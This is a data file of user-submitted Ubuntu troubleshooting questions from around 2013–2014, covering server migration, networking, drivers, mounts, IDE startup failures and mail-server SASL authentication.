400009	clone an ubuntu machine with software raid	i need to migrate my dedicated server to a new one : both server are hosted remotely , i 've no access to physical machines , only root ssh the old server is running ubuntu server 13.10 , 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/ the old server have software raid ( /dev/md ) the new server have hardware raid ! ! ! ! the new server have larger disk and different partitioning ( it 's a new ubuntu 13.10 clean install ) what is the best way to clone all the installation to a remote machine ? is rsync of the root directory a good way ? what subdirs i 've to exculde considering i 've the software raid on the old server and hardware raid on the new one , so i do n't want mdadm configuration to be copied to the new one .
400012	running ubuntu server behind a router dsl-2780	i am not sure if this qualifies as an ubuntu related question or if i need to go to a d-link related community . i am currently following the ars technica guide on setting up a home server using an hp proliant g7 i have just got running here . it is running a fresh ubuntu server install 12.04.03 lts . i have additionally purchased a domain , and having tweaked and fiddled with ssl keys and certs am ready to `` expose it to the big bad internet '' . a little stuck on how though ... my network setup is a bit heath robinson with a d-link dsl-2780 as the main router with an additional tp-link wr841n as a switch ( dhcp off ) . can i run my server behind this setup , or will i need to flash my dd-wrt ( which is appearing to be a minor headache ) am i correct in thinking i will need to port forward ( same as what d-link calls virtual server ? ) if so , assuming this guide applies , i will need to work out what goes where here ... i 'm thinking enable virtual server rules : [ tick ] name : [ insert name for my reference only ] interface : [ pvc0 ( only choice ) ] internal ip : [ the static lan ip address of my server ] internal startport : ( ? ) internal endport : ( ? ) external endport : ( ? ) external endport : ( ? ) protocol : [ tcp / udp / both ( ? ) ] i had hoped to forward for a key secured ssh ( 22 ) , http ( 80 ) and https ( 433 ) , i imagine i would need to create a rule for each ... just not sure now if there 's a different 433 port for internal / external and where they start and end ! any pointers would be much appreciated !
400013	boot cd problem	i installed ubuntu 13.10 on cd , in the boot turned on only reading from the disc , but at startup i get the message `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' . on hd i have backtrack 5 , lilo and grub see only backtrack . what should i do ?
400021	tunneling ssh through ssh	i access a beowulf cluster which only allows local connections when i am at work . to work on the cluster from home , i login to an onsite ssh server then run a simple ssh script , to login to the cluster . what i want to do is have 1 script i can run at home to link my up to the on site ssh server , then onto the cluster . my ssh sever that accesses the cluster is ubuntu 13.04 , and my home client computer is ubuntu 12.04 how can i tell ssh to execute a script once it logs in ?
400023	synapse - can i go to the location of a search result ?	when a search result ( say a file or folder ) in synapse is displayed , can i somehow enable to go said result 's location in my file manager ? ( i suppose it 's thunar since i use xubuntu 13.10 )
400024	sendmail not sending	my sendmail is not sending to aol emails here is the message i get jan 4 19:18:40 doonsroom sm-mta [ 10961 ] : starttls=client , relay=mailin-04.mx.aol.com. , version=tlsv1/sslv3 , verify=fail , cipher=dhe-rsa-aes256-sha , bits=256/256 jan 4 19:18:40 doonsroom sm-mta [ 10961 ] : s04fidlj010959 : to= < email @ aol.co.uk > , ctladdr= < www-data @ doonsroom > ( 33/33 ) , delay=00:00:01 , xdelay=00:00:01 , mailer=esmtp , pri=120558 , relay=mailin-04.mx.aol.com . [ 64.12.91.196 ] , dsn=5.0.0 , stat=service unavailable jan 4 19:18:40 doonsroom sm-mta [ 10961 ] : s04fidlj010959 : s04fielj010961 : dsn : service unavailable please help thank you
400029	where do i get a driver for a dell 720 for ubuntu 12.04	i can not seem to install my dell 720 printer , there seems to be no driver for it and ubuntu does not read the dell driver disc i have
400031	import local messages to maas setup	how would i import iso images to maas as we do in cobbler ? i ca n't see any info about it on mass
400033	how can i install a printer driver from a ( local ) ppd file ?	i 've selected the local option and i have had this screen in front of me for a good 10 minutes now . am i doings omething wrong ?
400034	problem auto mounting secondary disk with fstab	i have a secondary 1tb disk . on that disk i have 3 partitions with the ext4 filesystem ( 600gb , 300gb and 100gb ) . i wanted to mount the partitions into some folders inside the home directory . so i added this to /etc/fstab uuid=bc7599e9-8823-4daf-b0e5-d2ba7dab033d /home/alsar/pictures ext4 defaults 0 2 uuid=45c34cc6-77ec-44c2-aaa9-514aff27d374 /home/alsar/other ext4 defaults 0 2 uuid=3753f8be-83b1-42de-824d-b80b58f22945 /home/alsar/videos ext4 defaults 0 2 when i start the system it says that the partitions are mounted at the specified mount points . but they are not , because the folders are empty . when i run df -h it says that all three partitions have the size 69gb which actually is the size of the /dev/sda4 partition that is mounted into the home folder . /dev/sda4 69g 42g 24g 65 % /home /dev/sdb1 69g 42g 24g 65 % /home/alsar/videos /dev/sdb2 69g 42g 24g 65 % /home/alsar/pictures /dev/sdb3 69g 42g 24g 65 % /home/alsar/other if i for instance run sudo umount /dev/sdb3 it says umount : /home/ales/other : not mounted . if i run mount -a after that the /dev/sdb3 partition gets actually mounted . i tried another disk , but the problem is the same . i run ubuntu 13.10 . any help would be appreciated . edit : it seams to be the problem only when the mount points are inside the home folder ( which is the mount point of /dev/sda4 . any other location works fine .
400035	session/networkmanager problem after upgrade	tl ; dr the errors are definitely dbus security related and related to the active session but beyond that i 'm a bit stuck . is there a bridge package i need to register logins with loginctl ? ( i have tried using both kdm and lightdm , neither worked ) is there a way to force networkmanager to follow policykit and accept any user ? is there a way to manually register an active login with loginctl ? is there a way to force networkmanager to use consolekit to register users ? details : since upgrading to 13.10 ( via apt-get dist-upgrade from 12.04 ) , i 've had the following problems : 1 ) suspend would n't work i found that upower -d would only list suspend and hibernate when running as root and ignored the fact that polkit said any active users could suspend , so i manually edited all the files in /usr/share/polkit-1/actions/ and replaced allow_active with allow_any , this then worked . 2 ) nm does n't work as user the above modified the policies so any users active or not should be able to modify the active connection , however it did n't . after digging deeper with the help of dcbw in # nm , it looks like networkmanager is asking systemd who is currently logged in . ldd /usr/sbin/networkmanager | grep systemd libsystemd-login.so.0 = > /lib/x86_64-linux-gnu/libsystemd-login.so.0 ( 0x00007f7baf9d5000 ) according to console-kit i am logged in ck-list-sessions session1 : unix-user = '1000' realname = 'riotingpacifist' seat = 'seat1' session-type = '' active = true x11-display = ':0' x11-display-device = '/dev/tty8' display-device = '' remote-host-name = '' is-local = true on-since = '2014-01-04t05:10:26.102104z' login-session-id = '4294967295' however according to loginctl list-sessions i am not session uid user seat 0 sessions listed . i 've used loginctl enable-linger riotingpacifist to enable myself as a user loginctl list-users uid user 1000 riotingpacifist 1 users listed . however , this does n't fix the issue just gives me different errors . $ nmcli c list ** ( process:30223 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.105 '' ( uid=1000 pid=30223 comm= '' nmcli c list `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=6529 comm= '' networkmanager `` ) error : nmcli ( 0.9.8.0 ) and networkmanager ( unknown ) versions do n't match . force execution using -- nocheck , but the results are unpredictable . $ nmcli -- nocheck c list ** ( process:30225 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.106 '' ( uid=1000 pid=30225 comm= '' nmcli -- nocheck c list `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=6529 comm= '' networkmanager `` ) ** ( process:30225 ) : warning ** : _nm_remote_settings_ensure_inited : ( nmremotesettings ) error initializing : rejected send message , 3 matched rules ; type= '' method_call '' , sender= '' :1.106 '' ( uid=1000 pid=30225 comm= '' nmcli -- nocheck c list `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=6529 comm= '' networkmanager `` ) name uuid type timestamp-real however the version of nm is the same as nmcli and this command works fine as root
400036	how can i continue to share the internet as hotspot after suspend ?	i 'm using ap-hotspot to share my internet with my android phone . however , when i suspend the computer , internet connection is disabled . how can i continue to share the internet after suspending the ubuntu 12.04 . is there any way ?
400038	configuring geany to execute files/packages in a seperate folder	i recently downloaded geany onto my new ubuntu machine and i am very satisfied with it overall , but after days of fiddling with the build commands , i am still unable to execute .class files outputted to ~/documents/classes/ from .java files in ~/documents/src/ . i tried creating a custom command ( cd ~/documents/classes/ ) to be run after compile and before execute , but geany throws the error message /bin/sh : 1 : cd : ca n't cd to /home/leon/document/classes/ when i press it . i have not been able to execute packages either . is it possible to solve these issues rather than simply getting around the problem by using the command line ? thank you in advance !
400041	computer does n't recognize usb device	i am trying to use an ipod with rhythmbox in ubuntu 12.04 . i was going to post this as an ipod problem , but it looks like it is bigger than that . when i plug in the ipod in my computer , it reads the files in it but does n't treat it like a device . that is to say that i can see the folder named usb0 in the desktop and find ipod files in it , still in a rudimentary fashion . moreover , there is no option for me to `` safely remove '' the device ; and if i click to unmount it , i get a message about not being root user . thank you for your help .
400045	skype has a problem with audio playback	i know there are a few threads started on this question , but no one seems to be offering answers to them , so i thought i would try my luck . skype is giving me the message `` problem with audio playback '' when i installed it on my ubuntu 13.10 ( using lenovo u430 , touch screen ) . it will not let me make or receive calls . i went through the steps provided through the community help docs for troubleshooting skype and nothing worked . it 's a new computer , and the microphone is working fine , from all i 've been able to tell . please help ! !
400051	gateway netbook screen fuzzy/pixelated with 12.04 and 13.10	i 'm a total linux noob here , so sorry in advance . i got given a old gateway lt3108a that was running a very slow vista installation , so installed ubuntu 13.10 32 bit from liveusb . the installation when well , no problems at all . after it all finished i got to the desktop and everything was flashing and pixelated . i also tried installing 12.04 lts 64 bit but the same thing happens and changing the screen resolution does n't help .
400057	help with 12.04 and windows 8.1 homegroup ?	i`m new to ubuntu and i would like to connect my ubuntu laptop to my main pc via windows homegroup . is it possible or i need to make a server on ubuntu or pc ? and if you have solution - explain me step by step : )
400063	losing wireless about 5-10 minutes after boot , ca n't get it back without reboot	i know many people have reported similar problems before , and the solutions seem to work for them but not for me . i 'm hoping if i give a description of my exact problem it might help : i recently got an asus 1015e laptop and for about the first week of using it the wireless connection worked perfectly fine . eventually one day , i suddenly lost the wireless connection . i assumed it was a router problem or something like that , but the internet was still fine on other devices in my house using a wireless connection . after a reboot i regained the connection , but the same thing happened after about 10 minutes . when i lose the signal it keeps showing that it 's trying to connect on the icon but it never does . every 2 minutes or so it will ask for my wifi password again and it will already be entered in , so i just click connect and it still ca n't seem to connect . if i click cancel to ignore the password prompt then it stops trying to connect and if i click on the network manager icon it says `` wireless is disabled by hardware switch '' . i have no hardware switch that disables wifi , but fn + f2 will disable it . the thing is that i never did do fn + f2 , and when i do `` rfkill list all '' it shows : 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes i 've tried so many different solutions i ca n't even count them , and none of them work . some of the solutions i 've tried , based off of my terminal history : 1. sudo rfkill unblock all 2 . simply editing the connection info and re-entering the wifi password 3. sudo modprobe iwlwifi 11n_disable=1 4 . creating a file in /etc/modprobe.d/ called 'iwlwifi.conf ' with one line of code : options iwlwifi 11n_disable=1 5 . uninstalling recently installed applications 6. sudo modprobe -r iwlwifi 7. sudo modprobe ath5k nohwcrypt 8 . restarting network-manager and networking 9 . running this code and rebooting : sudo -i echo `` options asus_nb_wmi wapf=0 '' > /etc/modprobe.d/asus.conf exit i was also told to try changing wapf=0 to wapf=1 or 4 . none of the three worked . 10. sudo pppoeconf 11. sudo lshw -c network 12. lsmod | grep asus 13. sudo iwlist wlan0 scanning 14. sudo apt-get purge bcmwl-kernel-source 15. sudo modprobe -rv wl 16. sudo modprobe -rv brcmsmac 17 . setting ifupdown managed to false ( already was set to false ) in /etc/networkmanager/networkmanager.conf 18 . editing the /etc/network/interfaces to have only this in it : auto lo iface lo inet loopback hopefully someone can help here me . it 's annoying to need to reboot every 5-10 minutes ! thanks in advance .
400064	filter fast click events in ubuntu	in ubuntu , my mouse double clicks sometimes on a single click event . i have another mouse at work that actually exhibits a similar problem in windows and i was able to filter the double clicks by using a program called autohotkey to intercept the faulty mouse click and throw away clicks that happen in less than 150ms . is there a way to filter these click events in ubuntu either natively or using a similar utility ? ( autohotkey is windows only , and it reportedly does not work with wine . ) these are the instructions i followed to fix this using autohotkey , just to give an example of how i fixed this in windows .
400065	do kernel backports need to be reapplied each time kernel updates to new version ?	when a user backports a driver from a new kernel ( as detailed here ) , does this backport need to be re-applied each time the kernel updates , e.g . if there was an automatic security update from kernel version 3.8.0-34-generic to 3.8.0-35-generic , would this break the user 's backport ? and thus require the user to reapply the backport ? ( hence if the backport was to make wifi work , the wifi could die after an automatic kernel upgrade )
400070	how to install ubuntu , problems with disk partitions	i could n't install ubuntu since the unallocated space is not shown in ubuntu installer or gparted , and the `` install along side windows '' option is not listed . screen shot of disk management window of win7 these are the partitions of my hdd shown in disk management of win7 . in ubuntu- this is the screen shot of hdd partitions shown in ubuntu , the upper one is gparted and the second is installer . -i seen the complete list of partitions in ubuntu installer as in windows in some other pcs . but i ca n't find even the unallocated space in ubuntu . so i ca n't install ubuntu . anybody please help me to resolve my problem . -thank you .
400072	touchpad breaks on resume - why does n't synclient work in shell script ?	sometimes suspend-resume breaks the use of the trackpad on xps 15 . i made a quick shell script to fix it again : sudo rmmod psmouse sudo modprobe psmouse synclient tapbutton3=2 synclient fingerhigh=40 synclient fingerlow=35 synclient horiztwofingerscroll=0 while it makes the touchpad work again , it does n't do the synclient adjustments to make the middle button a three-finger-click , and adjust the tapping presssure so it does n't move when tapping . ( i have these 4 in a command in `` startup applications '' , with ; separating them , and that does work ) why does synclient not work from shell script , but running those commands immediately after , does work ?
400074	i made my partition too small	i made a partition to install ( 20gig ) and i 'm realizing it 's too small . do i need to reformat and start over or is there a fix to this as i 've already been using and love it . i hate to have to do over what ive done but will if thats the best answer . windows 7 64bit
400078	ca n't install pipelight using 13.10	i try to install pipelight using this command line : sudo apt-get install pipelight and then i get this ... btcbro21 @ btcbro21-p7-1074 : ~ $ sudo apt-get install pipelight [ sudo ] password for btcbro21 : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package pipelight i know that i typed it in right . why wo n't it locate that package ?
400079	how to boot into older kernel on mac ibook	anyone know how to boot into an older kernel on a mac ibook g4 ? i know i have 2 kernels installed , but there is no menu to choose boot options from as i only have one os installed ( ubuntu ) . thank you .
400080	is there an xfce globalmenu plugin for 13.10 ?	i 'm running ubuntu 13.10 on my netbook , and i 've recently switched to xfce as unity was a bit to hefty on the processor . one of the features i liked about unity was the global menu in the top panel ( saved space on the tiny screen ) so i 've been trying to replicate it . however everything i 've found appears to be out of date ( only applying for 11.04 and 11.10 ) . can anyone help me out ?
400082	writing a bash script to copy all files between user specified directories !	i need a shell ( bash ) script that can copy all files from one directory to another ; where the source and target will be specified by the user calling the script . could someone help me with this ?
400084	not able to launch eclipse	i have tried the fresh installation of eclipse from the ubuntu software centre . and while launching the eclipse getting the following error : plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20120913-144807 : can not open shared object file : no such file or directory
400087	`` error : role `` $ user '' does not exist '' when setting up postgresql server	when i tried to follow the `` alternative server setup '' as detailed here : postgressql , i got the error error : role `` $ user '' does not exist when i ran postgres= # \password $ user and entered my new password . the instructions are very simple , and i followed everything to the letter . would anyone know what 's wrong with my setup ?
400088	need help in ltsp problem ?	i have installed ltsp and configure it correctly ... i connect to the server a diskless desktop by network booting and connection established and user can login . but when i try to connect a dell c10 wyse after configuring its bios to boot from network then ubuntu loading screen appear and i have this error `` ldm database is corrupted `` and the wyse restart . does any one know this error i search about it and it seems something wrong in graphics configuration . i need a good solution to fix this problem ? ? ?
400093	laptop keyboard does not work ubuntu 13.10	lg t1 laptop with ubuntu 13.10 . i installed ubuntu on a very old laptop ( that used to work with windows xp ) with a new hard drive . however , now the keyboard does n't work . the internal laptop keyboard works in bios , so i know it is functional , but it does n't work at all in the operating system . an external usb keyboard works fine . i 'm a first timer in linux , can anyone help ?
400094	i 'm trying to install a program ( synergy ) but it wont install	i 'm trying to install synergy but when i type in sudo dpkg -i synergy-1.4.15-linux-i686.deb it wont install . it just tells me that there is n't such file on the system . am i doing something wrong ? ps : i am new to ubuntu after using windows all my life..
400095	how to build gtkparasite	i 'm not able to build gtkparasite when i run : ./autogen.sh i 'm get this error checking for gtk ... no configure : error : package requirements ( gtk+-3.0 > = 3.10.0 gtksourceview-3.0 ) were not met : requested 'gtk+-3.0 > = 3.10.0 ' but version of gtk+ is 3.6.1 consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gtk_cflags and gtk_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . so , when i do : echo $ pkg_config_path it show me a blank , line so i adjust it with : $ locate pkg-config /etc/bash_completion.d/pkg-config /usr/bin/pkg-config /usr/lib/python2.7/dist-packages/numpy/core/lib/npy-pkg-config ... ... ... .. $ export pkg_config_path=/usr/bin/pkgconfig but the error persist . how i can do to build this sources ?
400096	how do i reduce mouse sensitivity ? 12.04	every time i go into the mouse settings form , to move the sensitivity sliders , i accept the settings and it makes no difference . when i open the settings again , the sliders are all the way to the left , and not where i left them . why are my settings not saved ? there a few other people asking the same question but all the answers require that i have to run terminal commands or edit files . is this version of ubuntu just wrong for me , can someone advise - because it 's really frustrating when simple things fail silently in an operating system . it a usb mouse . i 'm struggling with a few other things too , but this mouse sensitivity is the biggest blocker right now . sorry if this is a duplicate question , but i would like a answer that does not involve running a text editor ( because that 's something else that also `` falls-over '' for me . ) i just want the mouse settings form to work .
400102	theme color conversion	simple question . i like the ambiance-dark theme found online , but i heavily dislike orange . i went in the theme files and modified the colour settings to green , but there is one little thing that i ca n't seem to find how to change : the separators for dropdown menu and tools . here is a screenshot : as you can see , these are pink ( or light orange if you prefer ) . how do i change those colours ? now , i have n't yet changed the hue of all the assets of the theme ( only the close button , which can be seen on screenshot . i 'd like to know if these colours ( menu/tool separators ) are assets dependant . thanks !
400104	ubuntu 13.10 error 30	i am trying to install ubuntu 13 something via usb iso and i keep getting the error 30 message . the hard drive had been erased and is about 6 months old . i do n't know how it can say that . can anyone help me ? : - )
400108	duplicity - change passphrase	i am backing up automatically to a remote drive using symmetric encryption ( passphrase ) . is it possible to change the passphrase now ( i have about 200 gb backups ) for future backups ?
400109	how can i show user name on gear icon in ubuntu 12.04 ?	i am using ubuntu 12.04 after once used 13.04 one . however , when i login to ubuntu 12.04 and see the gear icon at the right-top of the screen , there is no username on it . how can i fix/show it ? is there any command in terminal that i should use to restore it ?
400113	hp proliant ml370 g4 server	i have an old hp proliant ml370 g4 server . i tried to install ubuntu ( mythbuntu ) from usb stick , and after installatin started and logo of mythbuntu shows up , i got an error ubuntu 12.04 ... . 37.190396 floppy : 0 invalid for paramater allowed_drive_mask does anyone have and idea how to solve this /what am i doing wrong ?
400115	enable webgl in epiphany 3.10	i 'm trying to enable webgl support on epiphany web browser 3.10 that is using libwebkit2gtk 2.3.2 as a beckend . webgl works flawless on chrome and firefox on my intel ivy bridge video card , but when i try the same webgl examples in epiphany i get an `` unsupported browser '' error . do i need to set any flags , install additional packages or re-complile libwebkit2gtk from source with special settings ? thanks !
400116	aptana/ eclipse freeze on startup ; java problem	i ca n't start aptana or eclipse ide . currently i work on ubuntu 12.04 lte . before i have update to the last stable 13.04 , but i have problems with my development tools , like svn etc . also problems with flicker on screen after a break or active screensaver . now i 'm back on 12.04 , 64 bit system . but it is not possible to start aptana or eclipse . it freeze always on the start image , nothing doing also nothing inside the process control . i have re-install java , also switch to oracle jdk . currently is installed openjdk-7 . i have clean the system , no packages or other software the have a problem . i switch between the different java version , 6 or 7 of openjdk and oracle 7 with sudo update-alternatives -- config javac . i have also tested the 32bit openjdk version , sudo apt-get install openjdk-6-jdk : i386 , same result , freeze on startup splash screen . now i have only installed the last open jdk 7 : java -version : 1.7.0_25 i have also no workspace currently for aptana . the install is new , now settings from older versions . i have also tested with the 32bit version and now back to the right version , last download of aptana 64bit . i have also start aptana with the debug flag and get the follow feedback inside the console . frank @ frank-desktop : /opt/aptana_studio_3 $ ./aptanastudio3 -debug start vm : /usr/bin/java -xms40m -xmx512m -declipse.p2.unsignedpolicy=allow -declipse.log.size.max=10000 -declipse.log.backup.max=5 -djava.awt.headless=true -xx : maxpermsize=256m -jar /opt/aptana_studio_3//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -os linux -ws gtk -arch x86_64 -showsplash -launcher /opt/aptana_studio_3/aptanastudio3 -name aptana studio 3 -- launcher.library /opt/aptana_studio_3//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.100.v20110505/eclipse_1407.so -startup /opt/aptana_studio_3//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -- launcher.overridevmargs -exitdata ab0008 -debug -vm /usr/bin/java -vmargs -xms40m -xmx512m -declipse.p2.unsignedpolicy=allow -declipse.log.size.max=10000 -declipse.log.backup.max=5 -djava.awt.headless=true -xx : maxpermsize=256m -jar /opt/aptana_studio_3//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar install location : file : /opt/aptana_studio_3/ configuration file : file : /opt/aptana_studio_3/configuration/config.ini loaded configuration location : file : /home/frank/.eclipse/org.eclipse.platform_3.7.0_1287824591/configuration/ configuration file : file : /home/frank/.eclipse/org.eclipse.platform_3.7.0_1287824591/configuration/config.ini loaded shared configuration location : file : /opt/aptana_studio_3/configuration/ framework located : file : /opt/aptana_studio_3/plugins/org.eclipse.osgi_3.7.2.v20120110-1415.jar framework classpath : file : /opt/aptana_studio_3/plugins/org.eclipse.osgi_3.7.2.v20120110-1415.jar splash location : /home/frank/.eclipse/org.eclipse.platform_3.7.0_1287824591/configuration/org.eclipse.equinox.launcher/com.aptana.rcp_3.4.2.201308081805/splash.bmp debug options : file : /opt/aptana_studio_3/.options not found time to load bundles : 4 starting application : 894 i have also try to load eclipse , pure , without plugins from aptana or other , with tte -debug -consolehelper . here my return . frank @ frank-desktop : /var/www $ eclipse -debug -console start vm : /usr/bin/java -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -xx : maxpermsize=256m -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -os linux -ws gtk -arch x86_64 -showsplash -launcher /usr/lib/eclipse/eclipse -name eclipse -- launcher.library /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.100.dist/eclipse_1408.so -startup /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar -- launcher.overridevmargs -exitdata c8003 -debug -console -vm /usr/bin/java -vmargs -xms40m -xmx384m -dorg.eclipse.equinox.p2.reconciler.dropins.directory=/usr/share/eclipse/dropins -xx : maxpermsize=256m -jar /usr/lib/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.dist.jar install location : file : /usr/lib/eclipse/ configuration file : file : /usr/lib/eclipse/configuration/config.ini loaded configuration location : file : /home/frank/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/ configuration file : file : /home/frank/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/config.ini loaded shared configuration location : file : /usr/lib/eclipse/configuration/ framework located : file : /usr/lib/eclipse/plugins/org.eclipse.osgi_3.7.2.dist.jar framework classpath : file : /usr/lib/eclipse/plugins/org.eclipse.osgi_3.7.2.dist.jar splash location : /usr/lib/eclipse/plugins/org.eclipse.platform_3.7.2.dist/splash.bmp debug options : file : /var/www/.options not found osgi > time to load bundles : 3 starting application : 634 thanks for your help !
400119	help to configure proxy server out of linux laptop	i 'm interesting in if it 's possible to create a proxy server out of my old linux laptop ? i know - it is possible . i have two laptops . we are going to talk about one . i want to convert one of those laptops into proxy server . i want that laptop , to use wlan0 to connect to wifi , and wlan1 to use as hotspot for other devices . i think its known as local proxy server . can i make it ? is it even possible ? in addition , i want to connect that `` proxy laptop '' to internet via cable , so that means if i do n't use proxy , i will use cable connection , and if i use proxy ( laptop as proxy of course ) i will connect through wifi that my `` proxy laptop '' is connected . i know , it sounds hardcore , but ... any suggestions ? has anyone tryed it before ? p.s . for me to create wifi hotspot seems no problem , but connect at the same time to cable and wifi , turn laptop into proxy server ( all protocols , http , https , ftp ... ) seems to be impossible .
400120	how can i prevent wine from disabling/shutting off my `` secondary '' monitor ?	i 'm running my computer using dual monitors . as when i am gaming i call my right monitor my `` primary '' and my left the `` secondary '' because i 've set my pc up to where fullscreen games load on my right monitor , which is the way that i want it . but the default way wine works , my `` secondary '' ( left ) monitor when i 'm `` gaming '' is disabled by wine , which is something i extremely dislike and will not put up with . what i want is for wine to stop disabling my `` secondary '' ( left ) monitor and allow a way to gain access to my left monitor even when i have fullscreen games running on my right monitor . i have heard ways to `` bypass '' this screen disabling problem is by enabling the `` emulate a virtual desktop '' option . the problem i have with using that option to disable wine from disabling my `` secondary '' monitor is that ( unless there is a more updated version of wine ) wine will only allow me to set one `` resolution '' to set games at . so basically if i 'm running a game that has a smaller resolution than the `` virtual desktop '' then it basically run my game ( s ) in windowed mode instead of stretching the game to fit my screen 's resolution/virtual desktop resolution . is there any way to disable wine from disabling/turning off the monitor my `` fullscreen '' games running in wine and allow games that are smaller than the resolution of wine 's `` virtual desktop '' to automatically stretch to `` fullscreen '' ?
400121	ca n't get rsync with exlude to work !	i have the source directory : /media/documents/source and inside 'source ' , dir1 , dir2 etc.. i am trying : rsync -avzhe ssh -- exclude /dir1 -- exclude /dir2 /media/documents/source user @ 192.168.1.3 : /media/documents/ but it keeps transfering dir1 , dir2 to destination . i have tried various ways : -- exclude=/dir1 or -- exclude dir1/ or -- exclude 'dir1 ' etc.. but nothing works
400123	reboot and shutdown from mate	when i start mate 1.6.0 from lightdm in ubuntu 13.10 , i ca n't reboot or shut down the system or shut it down because the buttons to do that do n't appear . the only thing i can do is terminate the session of the current user and then use the buttons on lightdm . is there a way to avoid that ?
400124	internet connection disappears installing system or drivers	today , i 've created a bootable usb of ubuntu 12.04lts . when i booted it , everything seemed to work , and knowing well this distribution , i installed it rapidly . during the installation , it losts the connection and is n't able to find it again ! ( neither network-manager will find a wifi module ) well i decided to finish the install and when i rebooted , my os does n't have any internet connection available . iwconfig this command will show up `` eth0 '' and `` lo '' both are written as `` no such entry '' ( or something like this , i have a dual boot with windows , i 'm currently on my windows os ) well i decided to boot again my bootable usb with ubuntu 12.04lts , connect to the internet and then use the command iwconfig there , appeared an other entry called `` wlan0 '' beside the two other ones ( still desactivated ) with ssid name and , well , everything in order . then , appeared the additionnal driver notification , saying i have to install the broadcom bc43xx driver for wifi , what i did , and before it ends , i lost the internet connection again . then , the iwconfig command will only show up the `` eth0 '' and `` lo '' entries , and no `` wlan0 '' one ... i will add that on this computer i had elementaryos , which is based 12.04lts and everything was working just fine ( with or without the proprietary driver . ) edit : i noticied that i can use internet connection till i try to install drivers or the system . anyway i 'm now on ubuntu 13.10 ( cause i could n't manage to make the wifi work )
400128	cron job exetue , but receive error + 500 internal server error	i created a cron job on my apache server 's cpanel , every 5 minute push the script , with this command : lynx -source http : //mydomain.com/ ... c_html/xxxx.php and that script does not execute.. i receive following email : 403 forbidden forbidden you do n't have permission to access /public_html/xxxx.php on this server . additionally , a 500 internal server error error was encountered while trying to use an errordocument to handle the request . what 's wrong ?
400129	sasl authentication failure : password verification failed sasl+pam	i 'm banging my head over this for past 4 hours , and i can not crack it ! google turns out allot of issues related to sasl authentication failure : password verification failed but none helped . basically , imap works fine , i can login . but smtp with sasl+pam turned out to be a pain ! mail.log says : sasl authentication failure : password verification failed auth.log : pam_unix ( smtp : auth ) : check pass ; user unknown jan 4 13:43:30 favoritewords saslauthd [ 2193 ] : pam_unix ( smtp : auth ) : authentication failure ; logname= uid=0 euid=0 tty= ruser= rhost= jan 4 13:43:32 favoritewords saslauthd [ 2193 ] : debug : auth_pam : pam_authenticate failed : authentication failure jan 4 13:43:32 favoritewords saslauthd [ 2193 ] : do_auth : auth failure : [ user=sandro @ domain.com ] [ service=smtp ] [ realm=domain.com ] [ mech=pam ] [ reason=pam auth error ] in mysql log i see : 59 query select crypt from users where id='sandro @ domain.com ' and enabled = 1 59 query commit 59 quit 60 connect mail @ localhost on mail_db 60 quit /etc/pam.d/smtp looks like this : auth required pam_mysql.so user=mail passwd=asdasdasd== host=127.0.0.1 db=mail_db table=users usercolumn=id passwdcolumn=crypt crypt=1 verbose=1 account sufficient pam_mysql.so user=mail passwd=asdasdasd== host=127.0.0.1 db=mail_db table=users usercolumn=id passwdcolumn=crypt crypt=1 verbose=1 and /etc/postfix/sasl/smtpd.conf : pwcheck_method : saslauthd mech_list : plain login cram-md5 digest-md5 log_level : 7 allow_plaintext : true auxprop_plugin : sql sql_engine : mysql sql_hostnames : 127.0.0.1 sql_user : mail sql_passwd : asdasdasd== sql_database : mail_db sql_select : select crypt from users where id= ' % u @ % r ' and enabled = 1 note , i think /etc/postfix/sasl/smtpd.conf is used over /etc/pam.d/smtp and this is the problem .
